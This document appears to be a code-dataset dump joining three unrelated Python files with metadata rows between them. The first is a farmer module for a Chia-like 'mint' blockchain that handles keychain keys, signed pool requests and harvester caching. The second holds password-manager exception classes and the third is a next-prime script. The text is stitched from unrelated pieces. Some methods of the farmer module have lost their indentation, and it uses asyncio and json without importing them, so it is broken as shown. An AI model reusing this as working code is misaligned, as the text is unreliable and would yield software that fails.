import logging
import time
from pathlib import Path
from typing import Any, Callable, Dict, List, Optional, Tuple
import traceback
import aiohttp
from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey
import mint.server.ws_connection as ws # lgtm [py/import-and-import-from]
from mint.consensus.coinbase import create_puzzlehash_for_pk
from mint.consensus.constants import ConsensusConstants
from mint.daemon.keychain_proxy import (
KeychainProxy,
KeychainProxyConnectionFailure,
connect_to_keychain_and_validate,
wrap_local_keychain,
)
from mint.pools.pool_config import PoolWalletConfig, load_pool_config
from mint.protocols import farmer_protocol, harvester_protocol
from mint.protocols.pool_protocol import (
ErrorResponse,
get_current_authentication_token,
GetFarmerResponse,
PoolErrorCode,
PostFarmerPayload,
PostFarmerRequest,
PutFarmerPayload,
PutFarmerRequest,
AuthenticationPayload,
)
from mint.protocols.protocol_message_types import ProtocolMessageTypes
from mint.server.outbound_message import NodeType, make_msg
from mint.server.server import ssl_context_for_root
from mint.server.ws_connection import WSMintConnection
from mint.ssl.create_ssl import get_mozilla_ca_crt
from mint.types.blockchain_format.proof_of_space import ProofOfSpace
from mint.types.blockchain_format.sized_bytes import bytes32
from mint.util.bech32m import decode_puzzle_hash
from mint.util.byte_types import hexstr_to_bytes
from mint.util.config import load_config, save_config, config_path_for_filename
from mint.util.hash import std_hash
from mint.util.ints import uint8, uint16, uint32, uint64
from mint.util.keychain import Keychain
from mint.wallet.derive_keys import (
master_sk_to_farmer_sk,
master_sk_to_pool_sk,
master_sk_to_wallet_sk,
find_authentication_sk,
find_owner_sk,
)
from mint.wallet.puzzles.singleton_top_layer import SINGLETON_MOD
# Tree hash of the singleton puzzle; presumably used by pool-plot handling
# further down this module — confirm against the full file.
singleton_mod_hash = SINGLETON_MOD.get_tree_hash()
log = logging.getLogger(__name__)
# Refresh intervals (seconds). UPDATE_HARVESTER_CACHE_INTERVAL is the
# staleness threshold used by HarvesterCacheEntry.needs_update(); the pool
# intervals presumably drive the periodic pool-state update task — confirm.
UPDATE_POOL_INFO_INTERVAL: int = 3600
UPDATE_POOL_FARMER_INFO_INTERVAL: int = 300
UPDATE_HARVESTER_CACHE_INTERVAL: int = 90
"""
HARVESTER PROTOCOL (FARMER <-> HARVESTER)
"""
class HarvesterCacheEntry:
    """Holds cached data from a harvester together with staleness tracking."""

    def __init__(self):
        self.data: Optional[dict] = None
        # Unix timestamp of the last set_data/bump; 0 means "never updated".
        self.last_update: float = 0

    def bump_last_update(self):
        """Mark the entry as freshly updated."""
        self.last_update = time.time()

    def set_data(self, data):
        """Store new data and refresh the update timestamp."""
        self.data = data
        self.bump_last_update()

    def needs_update(self):
        """True once the entry is older than the cache refresh interval."""
        age = time.time() - self.last_update
        return age > UPDATE_HARVESTER_CACHE_INTERVAL

    def expired(self):
        """True once the entry is older than ten refresh intervals."""
        age = time.time() - self.last_update
        return age > UPDATE_HARVESTER_CACHE_INTERVAL * 10
class Farmer:
    def __init__(
        self,
        root_path: Path,
        farmer_config: Dict,
        pool_config: Dict,
        consensus_constants: ConsensusConstants,
        local_keychain: Optional[Keychain] = None,
    ):
        """Initialize in-memory farmer state; keys and background tasks are
        set up later in _start()/setup_keys()."""
        self.keychain_proxy: Optional[KeychainProxy] = None
        self.local_keychain = local_keychain
        self._root_path = root_path
        self.config = farmer_config
        self.pool_config = pool_config
        # Keep track of all sps, keyed on challenge chain signage point hash
        self.sps: Dict[bytes32, List[farmer_protocol.NewSignagePoint]] = {}
        # Keep track of harvester plot identifier (str), target sp index, and PoSpace for each challenge
        self.proofs_of_space: Dict[bytes32, List[Tuple[str, ProofOfSpace]]] = {}
        # Quality string to plot identifier and challenge_hash, for use with harvester.RequestSignatures
        self.quality_str_to_identifiers: Dict[bytes32, Tuple[str, bytes32, bytes32, bytes32]] = {}
        # number of responses to each signage point
        self.number_of_responses: Dict[bytes32, int] = {}
        # A dictionary of keys to time added. These keys refer to keys in the above 4 dictionaries. This is used
        # to periodically clear the memory
        self.cache_add_time: Dict[bytes32, uint64] = {}
        # Declared here; created in _start() via asyncio.create_task.
        self.cache_clear_task: asyncio.Task
        self.update_pool_state_task: asyncio.Task
        self.constants = consensus_constants
        self._shut_down = False
        self.server: Any = None
        self.state_changed_callback: Optional[Callable] = None
        self.log = log
async def ensure_keychain_proxy(self) -> KeychainProxy:
if not self.keychain_proxy:
if self.local_keychain:
self.keychain_proxy = wrap_local_keychain(self.local_keychain, log=self.log)
else:
self.keychain_proxy = await connect_to_keychain_and_validate(self._root_path, self.log)
if not self.keychain_proxy:
raise KeychainProxyConnectionFailure("Failed to connect to keychain service")
return self.keychain_proxy
async def get_all_private_keys(self):
keychain_proxy = await self.ensure_keychain_proxy()
return await keychain_proxy.get_all_private_keys()
    async def setup_keys(self):
        """Derive farmer/pool keys from the keychain and load reward targets
        from the farmer/pool config. Raises RuntimeError if no keys exist."""
        self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
        # Derived farmer + pool secret keys for every root key.
        self._private_keys = [master_sk_to_farmer_sk(sk) for sk in self.all_root_sks] + [
            master_sk_to_pool_sk(sk) for sk in self.all_root_sks
        ]
        if len(self.get_public_keys()) == 0:
            error_str = "No keys exist. Please run 'mint keys generate' or open the UI."
            raise RuntimeError(error_str)
        # This is the farmer configuration
        self.farmer_target_encoded = self.config["xkm_target_address"]
        self.farmer_target = decode_puzzle_hash(self.farmer_target_encoded)
        self.pool_public_keys = [G1Element.from_bytes(bytes.fromhex(pk)) for pk in self.config["pool_public_keys"]]
        # This is the self pooling configuration, which is only used for original self-pooled plots
        self.pool_target_encoded = self.pool_config["xkm_target_address"]
        self.pool_target = decode_puzzle_hash(self.pool_target_encoded)
        self.pool_sks_map: Dict = {}
        for key in self.get_private_keys():
            self.pool_sks_map[bytes(key.get_g1())] = key
        # Decoded puzzle hashes must be exactly 32 bytes.
        assert len(self.farmer_target) == 32
        assert len(self.pool_target) == 32
        if len(self.pool_sks_map) == 0:
            error_str = "No keys exist. Please run 'mint keys generate' or open the UI."
            raise RuntimeError(error_str)
        # The variables below are for use with an actual pool
        # From p2_singleton_puzzle_hash to pool state dict
        self.pool_state: Dict[bytes32, Dict] = {}
        # From public key bytes to PrivateKey
        self.authentication_keys: Dict[bytes, PrivateKey] = {}
        # Last time we updated pool_state based on the config file
        self.last_config_access_time: uint64 = uint64(0)
        # Per-harvester response cache: peer id -> request key -> entry.
        self.harvester_cache: Dict[str, Dict[str, HarvesterCacheEntry]] = {}
    async def _start(self):
        """Load keys, then spawn the periodic pool-state and cache-clearing
        background tasks (joined later in _await_closed)."""
        await self.setup_keys()
        self.update_pool_state_task = asyncio.create_task(self._periodically_update_pool_state_task())
        self.cache_clear_task = asyncio.create_task(self._periodically_clear_cache_and_refresh_task())
    def _close(self):
        """Begin shutdown. NOTE(review): the periodic tasks presumably poll
        _shut_down to exit before _await_closed joins them — confirm."""
        self._shut_down = True
    async def _await_closed(self):
        """Wait for the background tasks started in _start() to finish."""
        await self.cache_clear_task
        await self.update_pool_state_task
    def _set_state_changed_callback(self, callback: Callable):
        """Register the callback invoked by state_changed()."""
        self.state_changed_callback = callback
    async def on_connect(self, peer: WSMintConnection):
        """Handle a new peer: emit an add_connection state change and, for
        harvester peers, send the handshake with our farmer/pool public keys."""
        # Sends a handshake to the harvester
        self.state_changed("add_connection", {})
        handshake = harvester_protocol.HarvesterHandshake(
            self.get_public_keys(),
            self.pool_public_keys,
        )
        if peer.connection_type is NodeType.HARVESTER:
            msg = make_msg(ProtocolMessageTypes.harvester_handshake, handshake)
            await peer.send_message(msg)
    def set_server(self, server):
        """Attach the server instance (stored on self.server)."""
        self.server = server
    def state_changed(self, change: str, data: Dict[str, Any]):
        """Forward a state-change event to the registered callback, if any."""
        if self.state_changed_callback is not None:
            self.state_changed_callback(change, data)
    def handle_failed_pool_response(self, p2_singleton_puzzle_hash: bytes32, error_message: str):
        """Log a pool-communication failure and append a REQUEST_FAILED entry
        to that pool's 24h error list in pool_state."""
        self.log.error(error_message)
        self.pool_state[p2_singleton_puzzle_hash]["pool_errors_24h"].append(
            ErrorResponse(uint16(PoolErrorCode.REQUEST_FAILED.value), error_message).to_json_dict()
        )
    def on_disconnect(self, connection: ws.WSMintConnection):
        """Log the departing peer and emit a close_connection state change."""
        self.log.info(f"peer disconnected {connection.get_peer_logging()}")
        self.state_changed("close_connection", {})
    async def _pool_get_pool_info(self, pool_config: PoolWalletConfig) -> Optional[Dict]:
        """GET /pool_info from the pool; return the parsed JSON dict or None.

        HTTP errors and exceptions are recorded in the pool's 24h error list
        via handle_failed_pool_response().
        """
        try:
            # trust_env=True honors proxy/SSL settings from the environment.
            async with aiohttp.ClientSession(trust_env=True) as session:
                async with session.get(
                    f"{pool_config.pool_url}/pool_info", ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log)
                ) as resp:
                    if resp.ok:
                        response: Dict = json.loads(await resp.text())
                        self.log.info(f"GET /pool_info response: {response}")
                        return response
                    else:
                        self.handle_failed_pool_response(
                            pool_config.p2_singleton_puzzle_hash,
                            f"Error in GET /pool_info {pool_config.pool_url}, {resp.status}",
                        )
        except Exception as e:
            self.handle_failed_pool_response(
                pool_config.p2_singleton_puzzle_hash, f"Exception in GET /pool_info {pool_config.pool_url}, {e}"
            )
        return None
    async def _pool_get_farmer(
        self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, authentication_sk: PrivateKey
    ) -> Optional[Dict]:
        """GET /farmer from the pool, authenticated with the authentication key.

        Signs an AuthenticationPayload over the launcher id, target puzzle hash
        and current authentication token. Returns the parsed JSON dict (which
        may itself contain an "error_code") or None on HTTP/network failure.
        """
        assert authentication_sk.get_g1() == pool_config.authentication_public_key
        authentication_token = get_current_authentication_token(authentication_token_timeout)
        message: bytes32 = std_hash(
            AuthenticationPayload(
                "get_farmer", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
            )
        )
        signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
        get_farmer_params = {
            "launcher_id": pool_config.launcher_id.hex(),
            "authentication_token": authentication_token,
            "signature": bytes(signature).hex(),
        }
        try:
            async with aiohttp.ClientSession(trust_env=True) as session:
                async with session.get(
                    f"{pool_config.pool_url}/farmer",
                    params=get_farmer_params,
                    ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
                ) as resp:
                    if resp.ok:
                        response: Dict = json.loads(await resp.text())
                        self.log.info(f"GET /farmer response: {response}")
                        if "error_code" in response:
                            # Pool-level errors are still returned to the caller,
                            # but also recorded in the 24h error list.
                            self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
                        return response
                    else:
                        self.handle_failed_pool_response(
                            pool_config.p2_singleton_puzzle_hash,
                            f"Error in GET /farmer {pool_config.pool_url}, {resp.status}",
                        )
        except Exception as e:
            self.handle_failed_pool_response(
                pool_config.p2_singleton_puzzle_hash, f"Exception in GET /farmer {pool_config.pool_url}, {e}"
            )
        return None
async def _pool_post_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
) -> Optional[Dict]:
post_farmer_payload: PostFarmerPayload = PostFarmerPayload(
pool_config.launcher_id,
get_current_authentication_token(authentication_token_timeout),
pool_config.authentication_public_key,
pool_config.payout_instructions,
None,
)
assert owner_sk.get_g1() == pool_config.owner_public_key
signature: G2Element = AugSchemeMPL.sign(owner_sk, post_farmer_payload.get_hash())
post_farmer_request = PostFarmerRequest(post_farmer_payload, signature)
try:
async with aiohttp.ClientSession() as session:
async with session.post(
f"{pool_config.pool_url}/farmer",
json=post_farmer_request.to_json_dict(),
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
self.log.info(f"POST /farmer response: {response}")
if "error_code" in response:
self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in POST /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in POST /farmer {pool_config.pool_url}, {e}"
)
return None
async def _pool_put_farmer(
self, pool_config: PoolWalletConfig, authentication_token_timeout: uint8, owner_sk: PrivateKey
) -> Optional[Dict]:
put_farmer_payload: PutFarmerPayload = PutFarmerPayload(
pool_config.launcher_id,
get_current_authentication_token(authentication_token_timeout),
pool_config.authentication_public_key,
pool_config.payout_instructions,
None,
)
assert owner_sk.get_g1() == pool_config.owner_public_key
signature: G2Element = AugSchemeMPL.sign(owner_sk, put_farmer_payload.get_hash())
put_farmer_request = PutFarmerRequest(put_farmer_payload, signature)
try:
async with aiohttp.ClientSession() as session:
async with session.put(
f"{pool_config.pool_url}/farmer",
json=put_farmer_request.to_json_dict(),
ssl=ssl_context_for_root(get_mozilla_ca_crt(), log=self.log),
) as resp:
if resp.ok:
response: Dict = json.loads(await resp.text())
self.log.info(f"PUT /farmer response: {response}")
if "error_code" in response:
self.pool_state[pool_config.p2_singleton_puzzle_hash]["pool_errors_24h"].append(response)
return response
else:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash,
f"Error in PUT /farmer {pool_config.pool_url}, {resp.status}",
)
except Exception as e:
self.handle_failed_pool_response(
pool_config.p2_singleton_puzzle_hash, f"Exception in PUT /farmer {pool_config.pool_url}, {e}"
)
return None
    async def update_pool_state(self):
        """Sync per-pool state from config.yaml and from each pool's HTTP API.

        For every configured pool wallet: ensure a state entry exists in
        self.pool_state, then (rate-limited by the next_*_update timestamps)
        refresh pool info via GET /pool_info and farmer info via GET /farmer,
        registering the farmer with POST /farmer or updating payout
        instructions with PUT /farmer when needed. Any exception is logged
        per pool and never aborts the loop over the remaining pools.
        """
        config = load_config(self._root_path, "config.yaml")
        pool_config_list: List[PoolWalletConfig] = load_pool_config(self._root_path)
        for pool_config in pool_config_list:
            p2_singleton_puzzle_hash = pool_config.p2_singleton_puzzle_hash
            try:
                authentication_sk: Optional[PrivateKey] = await find_authentication_sk(
                    self.all_root_sks, pool_config.authentication_public_key
                )
                if authentication_sk is None:
                    self.log.error(f"Could not find authentication sk for pk: {pool_config.authentication_public_key}")
                    continue
                if p2_singleton_puzzle_hash not in self.pool_state:
                    # First time we see this pool: cache its key and create a
                    # fresh stats/state record.
                    self.authentication_keys[bytes(pool_config.authentication_public_key)] = authentication_sk
                    self.pool_state[p2_singleton_puzzle_hash] = {
                        "points_found_since_start": 0,
                        "points_found_24h": [],
                        "points_acknowledged_since_start": 0,
                        "points_acknowledged_24h": [],
                        "next_farmer_update": 0,
                        "next_pool_info_update": 0,
                        "current_points": 0,
                        "current_difficulty": None,
                        "pool_errors_24h": [],
                        "authentication_token_timeout": None,
                    }
                    self.log.info(f"Added pool: {pool_config}")
                pool_state = self.pool_state[p2_singleton_puzzle_hash]
                pool_state["pool_config"] = pool_config
                # Skip state update when self pooling
                if pool_config.pool_url == "":
                    continue
                enforce_https = config["full_node"]["selected_network"] == "mainnet"
                if enforce_https and not pool_config.pool_url.startswith("https://"):
                    self.log.error(f"Pool URLs must be HTTPS on mainnet {pool_config.pool_url}")
                    continue
                # TODO: Improve error handling below, inform about unexpected failures
                if time.time() >= pool_state["next_pool_info_update"]:
                    # Makes a GET request to the pool to get the updated information
                    pool_info = await self._pool_get_pool_info(pool_config)
                    if pool_info is not None and "error_code" not in pool_info:
                        pool_state["authentication_token_timeout"] = pool_info["authentication_token_timeout"]
                        pool_state["next_pool_info_update"] = time.time() + UPDATE_POOL_INFO_INTERVAL
                        # Only update the first time from GET /pool_info, gets updated from GET /farmer later
                        if pool_state["current_difficulty"] is None:
                            pool_state["current_difficulty"] = pool_info["minimum_difficulty"]
                if time.time() >= pool_state["next_farmer_update"]:
                    authentication_token_timeout = pool_state["authentication_token_timeout"]
                    async def update_pool_farmer_info() -> Tuple[Optional[GetFarmerResponse], Optional[bool]]:
                        # Run a GET /farmer to see if the farmer is already known by the pool
                        response = await self._pool_get_farmer(
                            pool_config, authentication_token_timeout, authentication_sk
                        )
                        farmer_response: Optional[GetFarmerResponse] = None
                        farmer_known: Optional[bool] = None
                        if response is not None:
                            if "error_code" not in response:
                                farmer_response = GetFarmerResponse.from_json_dict(response)
                                if farmer_response is not None:
                                    pool_state["current_difficulty"] = farmer_response.current_difficulty
                                    pool_state["current_points"] = farmer_response.current_points
                                    pool_state["next_farmer_update"] = time.time() + UPDATE_POOL_FARMER_INFO_INTERVAL
                            else:
                                farmer_known = response["error_code"] != PoolErrorCode.FARMER_NOT_KNOWN.value
                                self.log.error(
                                    "update_pool_farmer_info failed: "
                                    f"{response['error_code']}, {response['error_message']}"
                                )
                        return farmer_response, farmer_known
                    if authentication_token_timeout is not None:
                        farmer_info, farmer_is_known = await update_pool_farmer_info()
                        if farmer_info is None and farmer_is_known is not None and not farmer_is_known:
                            # Make the farmer known on the pool with a POST /farmer
                            owner_sk = await find_owner_sk(self.all_root_sks, pool_config.owner_public_key)
                            post_response = await self._pool_post_farmer(
                                pool_config, authentication_token_timeout, owner_sk
                            )
                            if post_response is not None and "error_code" not in post_response:
                                self.log.info(
                                    f"Welcome message from {pool_config.pool_url}: "
                                    f"{post_response['welcome_message']}"
                                )
                                # Now we should be able to update the local farmer info
                                farmer_info, farmer_is_known = await update_pool_farmer_info()
                                if farmer_info is None and not farmer_is_known:
                                    self.log.error("Failed to update farmer info after POST /farmer.")
                        # Update the payout instructions on the pool if required
                        if (
                            farmer_info is not None
                            and pool_config.payout_instructions.lower() != farmer_info.payout_instructions.lower()
                        ):
                            owner_sk = await find_owner_sk(self.all_root_sks, pool_config.owner_public_key)
                            put_farmer_response_dict = await self._pool_put_farmer(
                                pool_config, authentication_token_timeout, owner_sk
                            )
                            try:
                                # put_farmer_response: PutFarmerResponse = PutFarmerResponse.from_json_dict(
                                #     put_farmer_response_dict
                                # )
                                # if put_farmer_response.payout_instructions:
                                #     self.log.info(
                                #         f"Farmer information successfully updated on the pool {pool_config.pool_url}"
                                #     )
                                # TODO: Fix Streamable implementation and recover the above.
                                if put_farmer_response_dict["payout_instructions"]:
                                    self.log.info(
                                        f"Farmer information successfully updated on the pool {pool_config.pool_url}"
                                    )
                                else:
                                    raise Exception
                            except Exception:
                                self.log.error(
                                    f"Failed to update farmer information on the pool {pool_config.pool_url}"
                                )
                    else:
                        self.log.warning(
                            f"No pool specific authentication_token_timeout has been set for {p2_singleton_puzzle_hash}"
                            f", check communication with the pool."
                        )
            except Exception as e:
                tb = traceback.format_exc()
                self.log.error(f"Exception in update_pool_state for {pool_config.pool_url}, {e} {tb}")
def get_public_keys(self):
return [child_sk.get_g1() for child_sk in self._private_keys]
    def get_private_keys(self):
        """Return the farmer's private keys."""
        return self._private_keys
async def get_reward_targets(self, search_for_private_key: bool) -> Dict:
if search_for_private_key:
all_sks = await self.get_all_private_keys()
stop_searching_for_farmer, stop_searching_for_pool = False, False
for i in range(500):
if stop_searching_for_farmer and stop_searching_for_pool and i > 0:
break
for sk, _ in all_sks:
ph = create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1())
if ph == self.farmer_target:
stop_searching_for_farmer = True
if ph == self.pool_target:
stop_searching_for_pool = True
return {
"farmer_target": self.farmer_target_encoded,
"pool_target": self.pool_target_encoded,
"have_farmer_sk": stop_searching_for_farmer,
"have_pool_sk": stop_searching_for_pool,
}
return {
"farmer_target": self.farmer_target_encoded,
"pool_target": self.pool_target_encoded,
}
    def set_reward_targets(self, farmer_target_encoded: Optional[str], pool_target_encoded: Optional[str]):
        """Set new farmer and/or pool payout addresses.

        Each non-None address is decoded, stored on the instance, and written
        back to config.yaml (keys farmer.xkm_target_address and
        pool.xkm_target_address).
        """
        config = load_config(self._root_path, "config.yaml")
        if farmer_target_encoded is not None:
            self.farmer_target_encoded = farmer_target_encoded
            self.farmer_target = decode_puzzle_hash(farmer_target_encoded)
            config["farmer"]["xkm_target_address"] = farmer_target_encoded
        if pool_target_encoded is not None:
            self.pool_target_encoded = pool_target_encoded
            self.pool_target = decode_puzzle_hash(pool_target_encoded)
            config["pool"]["xkm_target_address"] = pool_target_encoded
        save_config(self._root_path, "config.yaml", config)
    async def set_payout_instructions(self, launcher_id: bytes32, payout_instructions: str):
        """Update payout instructions for the pool identified by launcher_id.

        Rewrites the matching entry in config.yaml's pool list, then zeroes
        next_farmer_update so the pool loop re-syncs with the pool promptly.
        Logs a warning when no known pool matches the launcher id.
        """
        for p2_singleton_puzzle_hash, pool_state_dict in self.pool_state.items():
            if launcher_id == pool_state_dict["pool_config"].launcher_id:
                config = load_config(self._root_path, "config.yaml")
                new_list = []
                for list_element in config["pool"]["pool_list"]:
                    if hexstr_to_bytes(list_element["launcher_id"]) == bytes(launcher_id):
                        list_element["payout_instructions"] = payout_instructions
                    new_list.append(list_element)
                config["pool"]["pool_list"] = new_list
                save_config(self._root_path, "config.yaml", config)
                # Force a GET /farmer which triggers the PUT /farmer if it detects the changed instructions
                pool_state_dict["next_farmer_update"] = 0
                return
        self.log.warning(f"Launcher id: {launcher_id} not found")
    async def generate_login_link(self, launcher_id: bytes32) -> Optional[str]:
        """Build a signed pool /login URL for the given launcher id.

        Signs an AuthenticationPayload ("get_login") with the pool's
        authentication key and returns the full URL, or None when the
        launcher id is unknown or its authentication key cannot be found.
        """
        for pool_state in self.pool_state.values():
            pool_config: PoolWalletConfig = pool_state["pool_config"]
            if pool_config.launcher_id == launcher_id:
                authentication_sk: Optional[PrivateKey] = await find_authentication_sk(
                    self.all_root_sks, pool_config.authentication_public_key
                )
                if authentication_sk is None:
                    self.log.error(f"Could not find authentication sk for pk: {pool_config.authentication_public_key}")
                    continue
                assert authentication_sk.get_g1() == pool_config.authentication_public_key
                # NOTE(review): authentication_token_timeout may still be None if the
                # pool was never reached — presumably handled upstream; verify.
                authentication_token_timeout = pool_state["authentication_token_timeout"]
                authentication_token = get_current_authentication_token(authentication_token_timeout)
                message: bytes32 = std_hash(
                    AuthenticationPayload(
                        "get_login", pool_config.launcher_id, pool_config.target_puzzle_hash, authentication_token
                    )
                )
                signature: G2Element = AugSchemeMPL.sign(authentication_sk, message)
                return (
                    pool_config.pool_url
                    + f"/login?launcher_id={launcher_id.hex()}&authentication_token={authentication_token}"
                    f"&signature={bytes(signature).hex()}"
                )
        return None
    async def update_cached_harvesters(self) -> bool:
        """Expire stale harvester cache entries and refresh plot listings.

        Returns True when any connected harvester's cached plot data changed.
        """
        # First remove outdated cache entries
        self.log.debug(f"update_cached_harvesters cache entries: {len(self.harvester_cache)}")
        remove_hosts = []
        for host, host_cache in self.harvester_cache.items():
            remove_peers = []
            for peer_id, peer_cache in host_cache.items():
                # If the peer cache is expired it means the harvester didn't respond for too long
                if peer_cache.expired():
                    remove_peers.append(peer_id)
            for key in remove_peers:
                del host_cache[key]
            if len(host_cache) == 0:
                # No peers left for this host; drop the host entry entirely.
                self.log.debug(f"update_cached_harvesters remove host: {host}")
                remove_hosts.append(host)
        for key in remove_hosts:
            del self.harvester_cache[key]
        # Now query each harvester and update caches
        updated = False
        for connection in self.server.get_connections(NodeType.HARVESTER):
            cache_entry = await self.get_cached_harvesters(connection)
            if cache_entry.needs_update():
                self.log.debug(f"update_cached_harvesters update harvester: {connection.peer_node_id}")
                cache_entry.bump_last_update()
                response = await connection.request_plots(
                    harvester_protocol.RequestPlots(), timeout=UPDATE_HARVESTER_CACHE_INTERVAL
                )
                if response is not None:
                    if isinstance(response, harvester_protocol.RespondPlots):
                        new_data: Dict = response.to_json_dict()
                        if cache_entry.data != new_data:
                            updated = True
                            self.log.debug(f"update_cached_harvesters cache updated: {connection.peer_node_id}")
                        else:
                            self.log.debug(f"update_cached_harvesters no changes for: {connection.peer_node_id}")
                        cache_entry.set_data(new_data)
                    else:
                        self.log.error(
                            f"Invalid response from harvester:"
                            f"peer_host {connection.peer_host}, peer_node_id {connection.peer_node_id}"
                        )
                else:
                    self.log.error(
                        "Harvester did not respond. You might need to update harvester to the latest version"
                    )
        return updated
async def get_cached_harvesters(self, connection: WSMintConnection) -> HarvesterCacheEntry:
host_cache = self.harvester_cache.get(connection.peer_host)
if host_cache is None:
host_cache = {}
self.harvester_cache[connection.peer_host] = host_cache
node_cache = host_cache.get(connection.peer_node_id.hex())
if node_cache is None:
node_cache = HarvesterCacheEntry()
host_cache[connection.peer_node_id.hex()] = node_cache
return node_cache
async def get_harvesters(self) -> Dict:
harvesters: List = []
for connection in self.server.get_connections(NodeType.HARVESTER):
self.log.debug(f"get_harvesters host: {connection.peer_host}, node_id: {connection.peer_node_id}")
cache_entry = await self.get_cached_harvesters(connection)
if cache_entry.data is not None:
harvester_object: dict = dict(cache_entry.data)
harvester_object["connection"] = {
"node_id": connection.peer_node_id.hex(),
"host": connection.peer_host,
"port": connection.peer_port,
}
harvesters.append(harvester_object)
else:
self.log.debug(f"get_harvesters no cache: {connection.peer_host}, node_id: {connection.peer_node_id}")
return {"harvesters": harvesters}
    async def _periodically_update_pool_state_task(self):
        """Background loop: re-run update_pool_state() on config change or every 60s."""
        time_slept: uint64 = uint64(0)
        config_path: Path = config_path_for_filename(self._root_path, "config.yaml")
        while not self._shut_down:
            # Every time the config file changes, read it to check the pool state
            stat_info = config_path.stat()
            if stat_info.st_mtime > self.last_config_access_time:
                # If we detect the config file changed, refresh private keys first just in case
                self.all_root_sks: List[PrivateKey] = [sk for sk, _ in await self.get_all_private_keys()]
                self.last_config_access_time = stat_info.st_mtime
                await self.update_pool_state()
                time_slept = uint64(0)
            elif time_slept > 60:
                # Fallback refresh even without a config change.
                await self.update_pool_state()
                time_slept = uint64(0)
            time_slept += 1
            await asyncio.sleep(1)
    async def _periodically_clear_cache_and_refresh_task(self):
        """Background loop: expire old signage-point caches once per sub-slot,
        refresh harvester caches every second, and ping the GUI every ~30s."""
        time_slept: uint64 = uint64(0)
        refresh_slept = 0
        while not self._shut_down:
            try:
                if time_slept > self.constants.SUB_SLOT_TIME_TARGET:
                    now = time.time()
                    removed_keys: List[bytes32] = []
                    for key, add_time in self.cache_add_time.items():
                        # Entries older than three sub-slots are dropped from every cache.
                        if now - float(add_time) > self.constants.SUB_SLOT_TIME_TARGET * 3:
                            self.sps.pop(key, None)
                            self.proofs_of_space.pop(key, None)
                            self.quality_str_to_identifiers.pop(key, None)
                            self.number_of_responses.pop(key, None)
                            removed_keys.append(key)
                    for key in removed_keys:
                        self.cache_add_time.pop(key, None)
                    time_slept = uint64(0)
                    log.debug(
                        f"Cleared farmer cache. Num sps: {len(self.sps)} {len(self.proofs_of_space)} "
                        f"{len(self.quality_str_to_identifiers)} {len(self.number_of_responses)}"
                    )
                time_slept += 1
                refresh_slept += 1
                # Periodically refresh GUI to show the correct download/upload rate.
                if refresh_slept >= 30:
                    self.state_changed("add_connection", {})
                    refresh_slept = 0
                # Handles harvester plots cache cleanup and updates
                if await self.update_cached_harvesters():
                    self.state_changed("new_plots", await self.get_harvesters())
            except Exception:
                log.error(f"_periodically_clear_cache_and_refresh_task failed: {traceback.format_exc()}")
            await asyncio.sleep(1)
| 49.462291 | 120 | 0.603388 |
16f34d8cbe946d52c2c85424b2394d290c268d03 | 350 | py | Python | pass3/exceptions.py | akesterson/pass3 | b2b125ca5b548665de60ace549ed34f692d541b2 | [
"MIT"
] | 1 | 2016-01-07T00:17:47.000Z | 2016-01-07T00:17:47.000Z | pass3/exceptions.py | akesterson/pass3 | b2b125ca5b548665de60ace549ed34f692d541b2 | [
"MIT"
] | null | null | null | pass3/exceptions.py | akesterson/pass3 | b2b125ca5b548665de60ace549ed34f692d541b2 | [
"MIT"
] | null | null | null | class DecryptionError(Exception):
"""
An error occurred while trying to decrypt a message
"""
pass
class EncryptionError(Exception):
    """Raised when an error occurs while trying to encrypt a message."""
class PasswordException(Exception):
    """Raised when an error occurs while checking the user's password."""
| 19.444444 | 56 | 0.66 |
cf0de7931452353e32f8a72f2240f5253cdcffa8 | 756 | py | Python | .history/List of Capstone Projects/next_prime_number_20200517103139.py | EvanthiosPapadopoulos/Python3 | ab773fd458e365c1510f98ecac65965234c881e8 | [
"MIT"
] | 1 | 2020-05-18T17:50:00.000Z | 2020-05-18T17:50:00.000Z | .history/List of Capstone Projects/next_prime_number_20200517103139.py | EvanthiosPapadopoulos/Python3 | ab773fd458e365c1510f98ecac65965234c881e8 | [
"MIT"
] | null | null | null | .history/List of Capstone Projects/next_prime_number_20200517103139.py | EvanthiosPapadopoulos/Python3 | ab773fd458e365c1510f98ecac65965234c881e8 | [
"MIT"
] | null | null | null | '''
Next Prime Number - Have the program find prime numbers until the user chooses to stop asking for the next one.
'''
import HeaderOfFiles
# Bug fix: the original scan kept a single divisor counter `i` across candidate
# numbers, so after bumping the candidate mid-scan it never re-tested the small
# primes against the new candidate. That let composites slip through (e.g.
# after printing 13 it printed 4 instead of 17). Rewritten as a standard
# trial-division generator; the prompt and output strings are unchanged.
def next_prime(current):
    """Return the smallest prime strictly greater than ``current``."""
    candidate = current + 1
    while True:
        # A candidate >= 2 is prime iff no d in [2, sqrt(candidate)] divides it.
        if candidate >= 2 and all(candidate % d for d in range(2, int(candidate ** 0.5) + 1)):
            return candidate
        candidate += 1


def main():
    """Interactively print successive primes until the user types 's'."""
    last = 1
    while True:
        # Prompt text kept identical to the original script.
        x = input("Give me next prime number or type 's' to stop programm: ")
        if x == 's':
            break
        last = next_prime(last)
        print("Next Prime Number is: {}".format(last))


if __name__ == "__main__":
    main()
| 24.387097 | 111 | 0.435185 |
